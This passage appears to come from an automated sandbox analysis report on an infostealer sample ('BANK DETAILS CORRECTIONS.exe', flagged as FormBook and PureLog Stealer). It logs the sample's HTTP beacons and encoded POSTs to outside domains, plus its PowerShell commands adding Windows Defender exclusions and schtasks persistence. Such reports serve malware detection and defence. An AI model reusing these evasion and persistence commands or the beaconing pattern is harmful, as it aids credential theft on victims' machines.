                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.2.10 | 49760 | 103.197.25.241 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:49:09.406210899 CET | 496 | OUT | GET /e6xn/?bvOt=0vI33Q4NEpmtOF7zniUBuj/B9uVSpeQXctuTHh1MPiMb1OOu6LKWAuvExYXMr2bPJ/7wAe8CJHHvd3UWKZqUB7/Hcv68Qi5JcHFgKGRsF2oedTZ7pw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.dxgsf.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:49:09.704766989 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:49:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  45 | 192.168.2.10 | 49761 | 89.31.143.90 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:49:15.008939981 CET | 748 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.le-kuk.shop
                                                                                  Referer: http://www.le-kuk.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=F8TOTAY1MFFwz4m5q7szFPZMjNdgK86z6RcS13pF80N7iDXj08OBeL5T9BwRxJXuWKTM67l5Lia7c/617sqCj8rU/TYjjbJIuCI8279M+pvTiVgmXvj/Z61pU+SGK+7Xi8eeEyKHvH27v6Yo96RfR2BH1ltT0JsBuXyLWeGfON+SWe2ty5aJpfAol+g/
                                                                                  Mar 18, 2024 14:49:15.190285921 CET    735    IN    HTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 18 Mar 2024 13:49:15 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 556
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Allow: GET, POST, HEAD
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  46    192.168.2.10    49762    89.31.143.90    80    6128    C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Mar 18, 2024 14:49:17.708077908 CET    772    OUT    POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.le-kuk.shop
                                                                                  Referer: http://www.le-kuk.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=F8TOTAY1MFFwyYW5pYEzS/ZLvtdgFc636QgS12sd8mp7liHjm56BdL5T2hwI/pXlWKv16+F5Lie7c7+14fyBisrBqjYh+LJIuCI827op+p3T+0QmQ+j4Ra0bV+SGO+7bi8fNE2rgvDG7v6oo8pIJCWBF7Fs017larlz5O/GSTuWlcfXqjo7e6ocmr4VV3wv5ltJ+4wvm1HXEHfERxA==
                                                                                  Mar 18, 2024 14:49:17.887317896 CET    735    IN    HTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 18 Mar 2024 13:49:17 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 556
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Allow: GET, POST, HEAD
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  47    192.168.2.10    49763    89.31.143.90    80    6128    C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Mar 18, 2024 14:49:20.411355972 CET    1785    OUT    POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.le-kuk.shop
                                                                                  Referer: http://www.le-kuk.shop/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:49:20.590485096 CET    735    IN    HTTP/1.1 405 Not Allowed
                                                                                  Date: Mon, 18 Mar 2024 13:49:20 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 556
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Allow: GET, POST, HEAD
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  48    192.168.2.10    49764    89.31.143.90    80    6128    C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Mar 18, 2024 14:49:23.116359949 CET    497    OUT    GET /e6xn/?bvOt=I+7uQ1p9U2QgrZ2LiZBQD/xPqYJdH7KI3wBT7UIkgW5Aog6q3Z2jXuQC4TUh/9LTZ7Sd+JF5RXm6MN/mwd+CmdOx0GtGi60mugQ+ypEmsJunmkEeVg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.le-kuk.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:49:23.299321890 CET    159    IN    HTTP/1.1 200 OK
                                                                                  Date: Mon, 18 Mar 2024 13:49:23 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Server: UD Webspace 3.2
                                                                                  Data Ascii: 19e0
                                                                                  Mar 18, 2024 14:49:23.299587011 CET    1286    IN
                                                                                  Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
                                                                                  Mar 18, 2024 14:49:23.299642086 CET    1286    IN
                                                                                  Mar 18, 2024 14:49:23.299721003 CET    1286    IN
                                                                                  Mar 18, 2024 14:49:23.299757004 CET    1286    IN
                                                                                  Data Ascii: Jd0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#l
                                                                                  Mar 18, 2024 14:49:23.299829960 CET    1286    IN
                                                                                  Data Ascii: lt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem
                                                                                  Mar 18, 2024 14:49:23.299875975 CET    201    IN
                                                                                  Data Ascii: w noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


                                                                                  Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                  49    192.168.2.10    49765    208.91.197.132    80    6128    C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp    Bytes transferred    Direction    Data
                                                                                  Mar 18, 2024 14:49:38.816864014 CET    760    OUT    POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.roblesprats.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.roblesprats.com
                                                                                  Referer: http://www.roblesprats.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=Dyv+8Mk+We8hSP6sSePcjC42gJ0msEH/qzeLSv+xvx4RWLD7T0lgLgI9jck52503QlckADKMraSOfmc6tDW3npx/F32/yOBSsrvXlhA0vllV12dAFbs6F6o63sodo3mUlqJCZ/z/OjeixgcV1QZPeNq+MT2VrSWMjsMEt8bIZfXH2osXXoPAjSP/FMon


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  50 | 192.168.2.10 | 49766 | 208.91.197.132 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:49:41.430145025 CET | 784 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.roblesprats.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.roblesprats.com
                                                                                  Referer: http://www.roblesprats.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=Dyv+8Mk+We8hTvKseZ7chi41550m50H7qzSLSrGbuDMRVvP7QxRgIgI9x8kg7Z08QlBHABeMrauOfj46tR+4m5x9JX2H8uBSsrvXlglbvkBV0FFAG6s1DKo9h8ods3mYlqJsZ+ekOg2ixlgV2BZMQNq4Dz3g9X/+jP8cn+OFGvPu4pNQG5uXwlTxLKdNK6rGZcSoFDh3T2+GaWNXaw==


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  51 | 192.168.2.10 | 49767 | 208.91.197.132 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:49:44.682219982 CET | 1797 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.roblesprats.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.roblesprats.com
                                                                                  Referer: http://www.roblesprats.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                                  Target ID:0
                                                                                  Start time:14:45:32
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Imagebase:0x940000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1302494818.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1295194192.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Imagebase:0xbc0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Imagebase:0xbc0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
                                                                                  Imagebase:0x300000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:14:45:34
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:14:45:35
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  Imagebase:0xf00000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:13
                                                                                  Start time:14:45:36
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Imagebase:0x3c0000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.1361939859.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 71%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:14:45:37
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff6616b0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:17
                                                                                  Start time:14:45:40
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:18
                                                                                  Start time:14:45:41
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp
                                                                                  Imagebase:0x300000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:19
                                                                                  Start time:14:45:41
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff620390000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:20
                                                                                  Start time:14:45:41
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  Imagebase:0x960000
                                                                                  File size:691'712 bytes
                                                                                  MD5 hash:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:21
                                                                                  Start time:14:45:42
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  Imagebase:0x310000
                                                                                  File size:31'744 bytes
                                                                                  MD5 hash:76676F0A21E6AF109845151B3CEFE211
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:22
                                                                                  Start time:14:45:46
                                                                                  Start date:18/03/2024
                                                                                  Path:C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe"
                                                                                  Imagebase:0x1c0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
